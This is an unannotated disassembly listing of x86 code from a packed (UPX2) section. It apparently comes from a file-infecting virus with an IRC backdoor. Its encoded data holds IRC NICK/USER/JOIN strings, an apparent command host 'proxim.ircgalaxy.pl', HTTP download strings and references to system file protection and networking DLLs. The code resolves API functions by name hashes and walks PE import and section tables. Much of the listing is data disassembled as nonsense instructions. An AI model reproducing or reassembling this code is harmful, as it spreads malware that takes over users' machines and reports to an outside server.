dec esi
jz short near ptr loc_3144A9B3+1
loc_3144A965: ; CODE XREF: sub_3144A697:loc_3144A8F4�j
; sub_3144A697+267�j
jo short near ptr loc_3144A9CB+1
outsb
loc_3144A968: ; CODE XREF: sub_3144A697+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_3144A9E3+1
loc_3144A975: ; CODE XREF: sub_3144A697+26D�j
jz short near ptr loc_3144A9DB+1
loc_3144A977: ; CODE XREF: sub_3144A697+279�j
; sub_3144A697+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_3144A9F1
jnz short near ptr loc_3144A9DF+1
insb
dec ebp
loc_3144A981: ; CODE XREF: sub_3144A697+29B�j
db 65h
insd
outsd
jb short near ptr loc_3144A9FC+3
loc_3144A986: ; CODE XREF: sub_3144A697+289�j
add [esi+74h], cl
push ecx
loc_3144A98A: ; CODE XREF: sub_3144A697:loc_3144A923�j
jnz short loc_3144A9F1
loc_3144A98C: ; CODE XREF: sub_3144A697:loc_3144A926�j
; sub_3144A697+29E�j
jb short near ptr loc_3144AA06+1
dec ecx
outsb
outsw
jb short near ptr loc_3144AA00+1
popa
jz short loc_3144AA00
outsd
outsb
push esp
outsd
loc_3144A99B: ; CODE XREF: sub_3144A697+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3144A9F7+2
jb short loc_3144AA0D
jz short near ptr loc_3144AA0A+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_3144A9AE: ; CODE XREF: sub_3144A697:loc_3144A947�j
db 65h
insd
outsd
loc_3144A9B1: ; CODE XREF: sub_3144A697+2C4�j
jb short loc_3144AA2C
loc_3144A9B3: ; CODE XREF: sub_3144A697+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_3144AA29+2
outsb
db 67h
push esp
outsd
inc ecx
loc_3144A9C7: ; CODE XREF: sub_3144A697+2BF�j
outsb
jnb short near ptr loc_3144AA32+1
push ebx
loc_3144A9CB: ; CODE XREF: sub_3144A697:loc_3144A965�j
jz short loc_3144AA3F
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_3144AA38
jb short loc_3144AA4D
jnz short near ptr loc_3144AA4A+1
loc_3144A9DB: ; CODE XREF: sub_3144A697:loc_3144A975�j
add [ebx+6Ch], ah
outsd
loc_3144A9DF: ; CODE XREF: sub_3144A697+2E6�j
jnb short loc_3144AA46
jnb short near ptr loc_3144AA51+1
loc_3144A9E3: ; CODE XREF: sub_3144A697+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_3144A9F1: ; CODE XREF: sub_3144A697+2E4�j
; sub_3144A697:loc_3144A98A�j
db 65h
jz short near ptr loc_3144AA5B+1
outsd
jnb short near ptr loc_3144AA69+2
loc_3144A9F7: ; CODE XREF: sub_3144A697+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_3144A9FC: ; CODE XREF: sub_3144A697+2ED�j
add gs:[edx+65h], dh
loc_3144AA00: ; CODE XREF: sub_3144A697+2FE�j
; sub_3144A697+2FB�j
arpl [esi+0], si
jnb short near ptr loc_3144AA69+1
outsb
loc_3144AA06: ; CODE XREF: sub_3144A697:loc_3144A98C�j
add fs:[ebx+6Fh], dh
loc_3144AA0A: ; CODE XREF: sub_3144A697+30D�j
arpl [ebx+65h], bp
loc_3144AA0D: ; CODE XREF: sub_3144A697+30B�j
jz short $+2
dec ecx
outsb
jz short loc_3144AA78
jb short loc_3144AA83
db 65h
jz short loc_3144AA5B
insb
outsd
jnb short near ptr loc_3144AA80+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_3144AA8C
jb short near ptr loc_3144AA96+1
loc_3144AA29: ; CODE XREF: sub_3144A697+329�j
db 65h
jz short loc_3144AA73
loc_3144AA2C: ; CODE XREF: sub_3144A697:loc_3144A9B1�j
db 65h
jz short loc_3144AA72
outsd
outsb
outsb
loc_3144AA32: ; CODE XREF: sub_3144A697+331�j
arpl gs:[ebp+64h], si
push ebx
loc_3144AA38: ; CODE XREF: sub_3144A697+33E�j
jz short near ptr loc_3144AA9A+1
jz short loc_3144AAA1
add [ecx+6Eh], cl
loc_3144AA3F: ; CODE XREF: sub_3144A697:loc_3144A9CB�j
jz short near ptr loc_3144AAA4+2
jb short loc_3144AAB1
db 65h
jz short near ptr loc_3144AA93+2
loc_3144AA46: ; CODE XREF: sub_3144A697:loc_3144A9DF�j
jo short loc_3144AAAD
outsb
inc ecx
loc_3144AA4A: ; CODE XREF: sub_3144A697+342�j
add [ecx+6Eh], cl
loc_3144AA4D: ; CODE XREF: sub_3144A697+340�j
jz short near ptr loc_3144AAB3+1
jb short loc_3144AABF
loc_3144AA51: ; CODE XREF: sub_3144A697+34A�j
db 65h
jz short near ptr loc_3144AAA2+1
jo short loc_3144AABB
outsb
push ebp
jb short near ptr loc_3144AAC4+2
inc ecx
loc_3144AA5B: ; CODE XREF: sub_3144A697+37E�j
; sub_3144A697:loc_3144A9F1�j
add [ecx+6Eh], cl
jz short near ptr loc_3144AAC4+1
jb short loc_3144AAD0
db 65h
jz short near ptr loc_3144AAB6+1
db 65h
popa
db 64h
inc esi
loc_3144AA69: ; CODE XREF: sub_3144A697+36C�j
; sub_3144A697+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_3144AA72: ; CODE XREF: sub_3144A697:loc_3144AA2C�j
dec ecx
loc_3144AA73: ; CODE XREF: sub_3144A697:loc_3144AA29�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_3144AA78: ; CODE XREF: sub_3144A697+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_3144AA80: ; CODE XREF: sub_3144A697+383�j
jnb short near ptr loc_3144AAE5+2
dec ebx
loc_3144AA83: ; CODE XREF: sub_3144A697+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_3144AAF1
loc_3144AA8C: ; CODE XREF: sub_3144A697+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_3144AAD4+2
js short loc_3144AAD4
loc_3144AA93: ; CODE XREF: sub_3144A697+3AC�j
add [edx+65h], dl
loc_3144AA96: ; CODE XREF: sub_3144A697+390�j
db 67h
push ecx
jnz short loc_3144AAFF
loc_3144AA9A: ; CODE XREF: sub_3144A697:loc_3144AA38�j
jb short near ptr loc_3144AB14+1
push esi
popa
insb
jnz short near ptr loc_3144AB05+1
loc_3144AAA1: ; CODE XREF: sub_3144A697+3A3�j
inc ebp
loc_3144AAA2: ; CODE XREF: sub_3144A697:loc_3144AA51�j
js short loc_3144AAE5
loc_3144AAA4: ; CODE XREF: sub_3144A697:loc_3144AA3F�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_3144AB02
popa
loc_3144AAAD: ; CODE XREF: sub_3144A697:loc_3144AA46�j
insb
jnz short near ptr loc_3144AB14+1
inc ebp
loc_3144AAB1: ; CODE XREF: sub_3144A697+3AA�j
js short loc_3144AAF4
loc_3144AAB3: ; CODE XREF: sub_3144A697:loc_3144AA4D�j
add [esi+33h], dl
loc_3144AAB6: ; CODE XREF: sub_3144A697+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_3144AABB: ; CODE XREF: sub_3144A697+3BD�j
mov edx, esp
push 1
loc_3144AABF: ; CODE XREF: sub_3144A697+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_3144AAC4: ; CODE XREF: sub_3144A697+3C7�j
; sub_3144A697+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_3144AAD0: ; CODE XREF: sub_3144A697+3C9�j
push esi
push dword ptr [eax+18h]
loc_3144AAD4: ; CODE XREF: sub_3144A697+3FA�j
; sub_3144A697+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_3144A697
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ; û
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_3144AAE5: ; CODE XREF: sub_3144A697:loc_3144AAA2�j
; sub_3144A697:loc_3144AA80�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ; è
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144A697
loc_3144AAF1: ; CODE XREF: sub_3144A697+3F3�j
add [edx+5], ch
loc_3144AAF4: ; CODE XREF: sub_3144A697:loc_3144AAB1�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_3144AAFF: ; CODE XREF: sub_3144A697+401�j
push esp
push 40h
loc_3144AB02: ; CODE XREF: sub_3144A697+412�j
push ecx
push edx
push ebx
loc_3144AB05: ; CODE XREF: sub_3144A697+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_3144AB14: ; CODE XREF: sub_3144A697:loc_3144AA9A�j
; sub_3144A697+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_3144A697
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ; •
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ; É
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ; ‹
db 0C4h ; Ä
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ; ƒ
db 0C0h ; À
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ; •
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ; ƒ
db 0C4h ; Ä
db 20h
db 33h ; 3
db 0D2h ; Ò
db 85h ; …
db 0C0h ; À
db 0Fh
db 99h ; ™
db 0C2h ; Â
db 0F7h ; ÷
db 0DAh ; Ú
db 58h ; X
db 23h ; #
db 0C2h ; Â
db 0C3h ; Ã
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ; è
db 0C1h ; Á
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ; „
db 0A5h ; ¥
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ; ‹
db 0D4h ; Ô
db 6Ah ; j
db 0
db 8Bh ; ‹
db 0CCh ; Ì
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ; •
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ; •
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ; …
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ; ‹
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ; ã
db 0Ch
db 8Dh ;
db 95h ; •
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ; Ñ
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ; Ò
db 8Bh ; ‹
db 85h ; …
db 0FEh ; þ
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ; è
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ; è
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ; è
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0F4h ; ô
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 85h ; …
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ; …
db 0C0h ; À
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ; „
db 29h ; )
db 0
db 0
db 0E8h ; è
db 0DFh ; ß
db 0FEh ; þ
db 0FFh
db 0FFh
db 8Bh ; ‹
db 0C7h ; Ç
db 5Fh ; _
db 0C3h ; Ã
db 55h ; U
db 0E8h ; è
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 500000h, 70000000h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 6C716274h
dd 6A6C6975h, 4553550Ah, 4A6D2052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 4CA2A1A8h
dd 10A61429h, 3AAB5957h, 0D8B8B352h, 9C77466h, 0C26CCC5Ch
dd 10A61413h, 823BE0B8h, 0C89FCC00h, 0ABD8C6BDh, 3E9DF5C3h
dd 2FA2F473h, 14h dup(0)
; =============== S U B R O U T I N E =======================================
sub_3144B4FC proc near ; CODE XREF: sub_3144B5B2:loc_3144B5A0�p
; sub_3144B603+7�p ...
arg_0 = dword ptr 4
pusha
and dword ptr [ebp+1042F4h], 0
and dword ptr [ebp+1042F8h], 0
movzx eax, word ptr [ebx+14h]
lea edx, [ebx+18h]
movzx ecx, word ptr [ebx+6]
add edx, eax
loc_3144B518: ; CODE XREF: sub_3144B4FC+41�j
mov eax, [esp+20h+arg_0]
sub eax, [edx+0Ch]
jb short loc_3144B53A
cmp eax, [edx+8]
jnb short loc_3144B53A
mov eax, [edx+14h]
sub eax, [edx+0Ch]
mov [ebp+1042F4h], edx
mov [ebp+1042F8h], eax
jmp short loc_3144B53F
; ---------------------------------------------------------------------------
loc_3144B53A: ; CODE XREF: sub_3144B4FC+23�j
; sub_3144B4FC+28�j
add edx, 28h
loop loc_3144B518
loc_3144B53F: ; CODE XREF: sub_3144B4FC+3C�j
popa
retn 4
sub_3144B4FC endp
; ---------------------------------------------------------------------------
mov [ebp+102467h], al
call sub_3144B5B2
push 20h
lea eax, [ebp+102394h]
pop ecx
loc_3144B55A: ; CODE XREF: UPX2:3144B561�j
cmp [eax], ebx
jz short loc_3144B56A
add eax, 4
loop loc_3144B55A
inc dword ptr [ebp+1042D0h]
retn
; ---------------------------------------------------------------------------
loc_3144B56A: ; CODE XREF: UPX2:3144B55C�j
neg ecx
add ecx, [ebp+102467h]
jecxz short loc_3144B584
loc_3144B574: ; CODE XREF: UPX2:3144B57C�j
push dword ptr [eax-4]
pop dword ptr [eax]
sub eax, 4
loop loc_3144B574
mov [ebp+102394h], ebx
; START OF FUNCTION CHUNK FOR sub_3144B5B2
loc_3144B584: ; CODE XREF: UPX2:3144B572�j
; sub_3144B5B2+34�j
cmp dword ptr [edx], 0
jz short loc_3144B58E
sub esi, [edx]
add esi, [edx+10h]
loc_3144B58E: ; CODE XREF: sub_3144B5B2-2B�j
lea ecx, [esi-4]
pop eax
pop ebx
pop esi
cmp dword ptr [edx], 0
jz short loc_3144B59D
push dword ptr [edx]
jmp short loc_3144B5A0
; ---------------------------------------------------------------------------
loc_3144B59D: ; CODE XREF: sub_3144B5B2-1B�j
push dword ptr [edx+10h]
loc_3144B5A0: ; CODE XREF: sub_3144B5B2-17�j
call sub_3144B4FC
sub ecx, esi
sub ecx, [ebp+1042F8h]
pop eax
add ecx, [ebx+34h]
retn
; END OF FUNCTION CHUNK FOR sub_3144B5B2
; =============== S U B R O U T I N E =======================================
sub_3144B5B2 proc near ; CODE XREF: UPX2:3144B549�p
; FUNCTION CHUNK AT 3144B584 SIZE 0000002E BYTES
pop dword ptr [ebp+1042D4h]
mov dword ptr [ebp+1042D0h], 0
call sub_3144B603
mov eax, [ebp+1042D0h]
call near ptr dword_3144AC38+43h
call sub_3144B5EF
cmp dword ptr [ebp+1042D0h], 0
jnz short loc_3144B5E8
mov [ebp+102410h], ebx
jmp short loc_3144B584
; ---------------------------------------------------------------------------
loc_3144B5E8: ; CODE XREF: sub_3144B5B2+2C�j
dec dword ptr [ebp+1042D0h]
retn
sub_3144B5B2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144B5EF proc near ; CODE XREF: sub_3144B5B2+20�p
pop dword ptr [ebp+1042D4h]
mov [ebp+1042D0h], edx
call sub_3144B603
xor ecx, ecx
retn
sub_3144B5EF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_3144B603 proc near ; CODE XREF: sub_3144B5B2+10�p
; sub_3144B5EF+C�p ...
var_C = dword ptr -0Ch
var_4 = dword ptr -4
mov edx, [ebx+80h]
push edx
call sub_3144B4FC
add edx, [ebp+1042F8h]
add edx, esi
loc_3144B617: ; CODE XREF: sub_3144B603+120�j
cmp dword ptr [edx+0Ch], 0
jz locret_3144B728
cmp dword ptr [edx+10h], 0
jz locret_3144B728
mov eax, [edx+0Ch]
push eax
call sub_3144B4FC
add eax, [ebp+1042F8h]
add eax, esi
push eax
loc_3144B63D: ; CODE XREF: sub_3144B603+47�j
mov cl, [eax]
cmp cl, 0
jz short loc_3144B65D
cmp cl, 2Eh
jz short loc_3144B64C
loc_3144B649: ; CODE XREF: sub_3144B603+58�j
inc eax
jmp short loc_3144B63D
; ---------------------------------------------------------------------------
loc_3144B64C: ; CODE XREF: sub_3144B603+44�j
mov ecx, [eax+1]
and ecx, 0DFDFDFDFh
cmp ecx, 4C4C44h
jnz short loc_3144B649
loc_3144B65D: ; CODE XREF: sub_3144B603+3F�j
pop ecx
sub ecx, eax
cmp ecx, 0FFFFFFFAh
jg loc_3144B720
cmp word ptr [eax-2], 3233h
jnz loc_3144B720
push esi
cmp dword ptr [edx], 0
jnz short loc_3144B680
mov ecx, [edx+10h]
jmp short loc_3144B682
; ---------------------------------------------------------------------------
loc_3144B680: ; CODE XREF: sub_3144B603+76�j
mov ecx, [edx]
loc_3144B682: ; CODE XREF: sub_3144B603+7B�j
add esi, ecx
push ecx
call sub_3144B4FC
add esi, [ebp+1042F8h]
loc_3144B690: ; CODE XREF: sub_3144B603+90�j
; sub_3144B603+117�j
lodsd
test eax, eax
js short loc_3144B690
jz loc_3144B71F
push dword ptr [ebp+1042F8h]
push eax
call sub_3144B4FC
add eax, [ebp+1042F8h]
pop dword ptr [ebp+1042F8h]
add eax, [esp+4+var_4]
push ebx
add eax, 2
xor ebx, ebx
loc_3144B6BC: ; CODE XREF: sub_3144B603+CE�j
movzx ecx, byte ptr [eax]
jecxz short loc_3144B6D3
or cl, 20h
push ebx
shl [esp+0Ch+var_C], 4
sub [esp+0Ch+var_C], ebx
sub [esp+0Ch+var_C], ecx
pop ebx
inc eax
jmp short loc_3144B6BC
; ---------------------------------------------------------------------------
loc_3144B6D3: ; CODE XREF: sub_3144B603+BC�j
cmp ebx, 0DDBBD70Fh
jz short loc_3144B719
cmp ebx, 0DB6E45A8h
jz short loc_3144B719
cmp ebx, 0FFA13B59h
jz short loc_3144B719
cmp ebx, 0ACB522D6h
jz short loc_3144B719
cmp ebx, 0F358E993h
jz short loc_3144B719
cmp ebx, 0F358E97Dh
jz short loc_3144B719
cmp ebx, 0E1253F46h
jz short loc_3144B719
cmp ebx, 0E1253F30h
jz short loc_3144B719
call dword ptr [ebp+1042D4h]
loc_3144B719: ; CODE XREF: sub_3144B603+D6�j
; sub_3144B603+DE�j ...
pop ebx
jmp loc_3144B690
; ---------------------------------------------------------------------------
loc_3144B71F: ; CODE XREF: sub_3144B603+92�j
pop esi
loc_3144B720: ; CODE XREF: sub_3144B603+60�j
; sub_3144B603+6C�j
add edx, 14h
jmp loc_3144B617
; ---------------------------------------------------------------------------
locret_3144B728: ; CODE XREF: sub_3144B603+18�j
; sub_3144B603+22�j
retn
sub_3144B603 endp
; ---------------------------------------------------------------------------
db 1, 6Ah, 4
dd 0F549E858h, 9588FFFFh, 102641h, 1831B866h, 0E4C0E202h
dd 66E20203h, 58066AABh, 0FFF52EE8h, 8C283FFh, 56AD187h
dd 0F521E858h, 0FA80FFFFh, 0B00B7303h, 41850250h, 0AA001026h
dd 686A27EBh, 0FA80AA58h, 0B0187503h, 0F501E811h, 1B8FFFFh
dd 84000000h, 0D10D74D2h, 0EBCAFEE0h, 0B805EBF6h, 80000000h
dd 0C3BFE2ABh, 39CC958Dh, 0D72B0010h, 0F7C3DAF7h, 1039C085h
dd 0
; ---------------------------------------------------------------------------
adc [edi], cl
xchg eax, ebp
rol cl, 0E0h
or esi, esi
test [esi+1001039h], edi
jnz short loc_3144B7BE
or ax, 2589h
